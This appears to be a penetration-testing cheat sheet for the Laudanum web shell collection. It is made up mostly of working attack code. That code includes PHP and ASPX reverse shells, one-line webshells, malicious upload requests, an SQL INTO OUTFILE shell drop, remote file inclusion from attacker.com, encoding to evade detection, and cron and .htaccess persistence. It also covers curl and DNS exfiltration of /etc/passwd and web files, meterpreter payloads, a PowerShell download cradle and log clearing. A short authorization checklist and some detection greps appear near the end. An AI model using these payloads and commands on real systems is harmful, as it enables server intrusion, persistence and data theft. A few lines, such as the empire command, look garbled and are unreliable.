Laudanum is a collection of pre-built, injectable web shells and reverse shell scripts designed for authorized penetration testing. It includes shells for multiple web technologies (ASP, ASPX, PHP, Perl, JSP, ColdFusion) and provides payloads for establishing reverse connections, spawning shells, and executing arbitrary commands on compromised web servers. Used by authorized security professionals for post-exploitation and lateral movement exercises.
# Clone Laudanum from GitHub
git clone https://github.com/laudanum/laudanum.git
cd laudanum
# List available shells
ls -la
# Directory structure
# ├── aspx/
# ├── asp/
# ├── php/
# ├── perl/
# ├── jsp/
# ├── cfm/
# └── shell_finder/
# Install dependencies
apt-get update
apt-get install curl wget netcat-openbsd
# Optional: PHP CLI for testing
apt-get install php-cli
# Make scripts executable
chmod +x laudanum/*/shell_finder/*
# Using Homebrew
brew install curl wget netcat
# Clone repository
git clone https://github.com/laudanum/laudanum.git
# Navigate to directory
cd laudanum
| Shell File | Type | Purpose |
|---|
php/shell.php | Interactive shell | Full command execution |
php/reverse.php | Reverse shell | Establish reverse connection |
php/upload.php | File upload | Upload files to server |
php/info.php | System info | Enumerate server details |
| Shell File | Type | Purpose |
|---|
aspx/shell.aspx | Interactive shell | Windows server exploitation |
aspx/reverse.aspx | Reverse shell | Reverse ASPX connection |
asp/shell.asp | Legacy shell | Classic ASP applications |
aspx/cmdasp.aspx | Command shell | Execute system commands |
# Copy PHP shell to web directory
cp laudanum/php/shell.php /var/www/html/
# Verify deployment
curl http://target.com/shell.php
# Test command execution
curl "http://target.com/shell.php?cmd=id"
curl "http://target.com/shell.php?cmd=whoami"
curl "http://target.com/shell.php?cmd=uname%20-a"
# Rename to bypass detection
cp laudanum/php/shell.php /tmp/config.php
# Upload via vulnerable form
# Using curl to POST file
curl -X POST -F "upload=@/tmp/config.php" \
http://target.com/upload.php
# Or use with XXE/LFI vulnerabilities
# URL encode the shell content
echo '<?php system($_GET["c"]); ?>' | base64
# Result: PD9waHAgc3lzdGVtKCRfR0VUWyJjIl0pOyA/Pg==
# Common parameter variations
curl "http://target.com/shell.php?cmd=id"
curl "http://target.com/shell.php?c=id"
curl "http://target.com/shell.php?cmd=whoami"
curl "http://target.com/shell.php?command=id"
curl "http://target.com/shell.php?exec=id"
curl "http://target.com/shell.php?system=id"
// From laudanum/php/reverse.php
<?php
$sock=fsockopen("ATTACKER_IP",PORT);
exec("/bin/bash -i <&3 >&3 2>&3");
?>
// Usage:
// 1. Modify ATTACKER_IP and PORT
// 2. Set up listener: nc -lvnp PORT
// 3. Upload and access shell
# Terminal 1: Set up listener
nc -lvnp 4444
# Terminal 2: Access reverse shell
curl http://target.com/reverse.php
# Or upload and execute if automated
# Connection established - full shell access
id
whoami
pwd
ls -la
# Copy ASPX reverse shell
cp laudanum/aspx/reverse.aspx /tmp/
# Modify connection details
sed -i 's/LHOST/192.168.1.100/g' reverse.aspx
sed -i 's/LPORT/4444/g' reverse.aspx
# Upload to ASP.NET application
# Access via: http://target.com/shell.aspx
# Use shell_finder to locate Laudanum shells
cd laudanum/shell_finder
# Find PHP shells in directory
./shell_finder.py /path/to/webroot --php
# Find all shell types
./shell_finder.py /path/to/webroot --all
# Recursive search
./shell_finder.py /var/www/html -r
# Signature detection
grep -r "shell.php" /var/www/html
grep -r "reverse.aspx" /var/www/html
grep -r "system(" /var/www/html
# Find by suspicious patterns
grep -r "fsockopen\|exec\|passthru" /var/www/html
grep -r "eval(" /var/www/html
grep -r "assert(" /var/www/html
# Stage 1: Drop initial shell via vulnerability
curl -X POST -d 'file=<?php include("http://attacker.com/shell.php"); ?>' \
http://target.com/vulnerable.php
# Stage 2: Second stage downloads full featured shell
# Shell 1 fetches Shell 2
curl -o /tmp/shell2.php http://attacker.com/shell2.php
# Stage 3: Executes with higher privileges or automation
php /tmp/shell2.php
# Base64 encode shell for bypass
base64 -w0 laudanum/php/shell.php > shell.b64
# Gzip compression
gzip -c laudanum/php/shell.php > shell.php.gz
# ROT13 encoding
tr 'A-Za-z' 'N-ZA-Mn-za-m' < laudanum/php/shell.php > shell.rot13
# Deploy encoded version
echo '<?php include(gzuncompress(base64_decode("ENCODED_CONTENT"))); ?>' > shell.php
# Create cron job for persistence
<?php
$cmd = "curl http://attacker.com/shell.php > /tmp/shell.php && php /tmp/shell.php";
exec("echo '*/5 * * * * $cmd' | crontab -");
?>
# Add to startup scripts
echo 'php /var/www/html/shell.php' >> ~/.bashrc
# Modify web server configuration
echo 'php_flag auto_prepend_file /var/www/html/shell.php' >> .htaccess
# Vulnerable upload handler found
POST /upload.php HTTP/1.1
Host: target.com
Content-Type: multipart/form-data
--boundary
Content-Disposition: form-data; name="file"; filename="image.php"
Content-Type: application/x-php
<?php system($_GET['c']); ?>
--boundary--
# Access shell
curl "http://target.com/uploads/image.php?c=id"
# If LFI exists, can include remote shell
http://target.com/page.php?file=http://attacker.com/shell.php
# Or include from /tmp if upload possible
http://target.com/page.php?file=/tmp/shell.php
# For wrapper exploitation
http://target.com/page.php?file=php://filter/convert.base64-encode/resource=shell.php
# If SQL results written to file
'; SELECT '<?php system($_GET["c"]); ?>' INTO OUTFILE '/var/www/html/shell.php'; --
# MySQL example
sqlmap -u "http://target.com/?id=1" --file-write=shell.php --file-dest=/var/www/html/shell.php
| Command | Purpose |
|---|
id | Show current user ID |
whoami | Display current username |
pwd | Print working directory |
ls -la | List directory contents |
cat /etc/passwd | Read system files |
ifconfig | Network configuration |
ps aux | Running processes |
# Enumerate system
uname -a
cat /etc/os-release
df -h
free -m
# Network reconnaissance
netstat -tuln
ss -tulnp
arp -a
route -n
# User enumeration
cat /etc/shadow # If writable
getent passwd
sudo -l
# Privilege escalation checks
find / -perm -4000 2>/dev/null
find / -perm -2000 2>/dev/null
dpkg -l | grep sudo
# Compress sensitive data
tar czf - /var/www/html/ | curl -X POST -d @- http://attacker.com/recv.php
# Encode and transmit
cat /etc/passwd | base64 | curl -d @- http://attacker.com/log.php
# DNS exfiltration (if HTTP blocked)
nslookup $(cat file.txt | base64 -w 0).attacker.com
# Web Application Firewall (WAF) bypass
# Use URL encoding, double encoding, hex encoding
# Example: system() -> sy%73%74%65%6d()
# Content-Type bypass
# Upload as image but use PHP content
# Magic bytes bypass
# Prepend valid file header to PHP shell
# JPEG: FF D8 FF E0 ... <?php ... ?>
# Log suspicious shell patterns
grep -l "exec\|system\|passthru\|shell_exec" /var/www/html/*
# Monitor process execution
auditctl -w /var/www/html/ -p wa -k webshell
# Check web server logs
tail -f /var/log/apache2/access.log | grep "system\|exec\|cmd"
# Find suspicious files
find /var/www/html -type f -newer /tmp/marker -ls
# Use Laudanum shells with msfvenom
msfvenom -p php/reverse_php LHOST=192.168.1.100 LPORT=4444 -o shell.php
# Generate ASP.NET shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f aspx > shell.aspx
# Generate handler
msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.100; set LPORT 4444; run"
# Generate PowerShell shell
./empire -U "User" -P "Pass" -E "invoke-expression(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')"
# Stage through Laudanum PHP shell
<?php
$ps_code = base64_decode($_POST['d']);
exec("powershell -enc $ps_code");
?>
# Check PHP is enabled
curl http://target.com/info.php
# Verify shell syntax
php -l shell.php
# Check file permissions
ls -la /var/www/html/shell.php
# Should be readable by web server user
# Test with different parameter names
curl "http://target.com/shell.php?cmd=id"
curl "http://target.com/shell.php?c=id"
curl "http://target.com/shell.php?command=id"
# Test listener is running
netstat -tuln | grep 4444
# Check firewall rules
sudo ufw status
sudo iptables -L -n
# Test reverse shell locally first
php laudanum/php/reverse.php
# With listener running first
nc -lvnp 4444
# Redirect errors to stdout
curl "http://target.com/shell.php?cmd=id%202%3E%261"
# Use alternative shells
<?php passthru($_GET['c']); ?>
<?php shell_exec($_GET['c']); ?>
<?php eval($_POST['c']); ?>
- Written scope of work defining authorized targets
- Explicit permission for shell deployment
- Time-limited testing window
- Secure handling and removal of shells post-engagement
- Incident response procedures documented
# Remove shells after testing
rm /var/www/html/shell.php
rm /var/www/html/reverse.aspx
rm /tmp/shell.php
# Clear logs of shell access
# (With proper authorization)
# grep -v "shell.php" /var/log/apache2/access.log > /tmp/access.log.clean
# Document all shells deployed
echo "shell.php deployed 2026-05-02 10:30 UTC - REMOVED"
- Laudanum GitHub Repository
- OWASP Web Shell Testing
- Reverse Shell Cheat Sheet
- Web Application Exploitation Guide
- Penetration Testing Execution Standard (PTES)
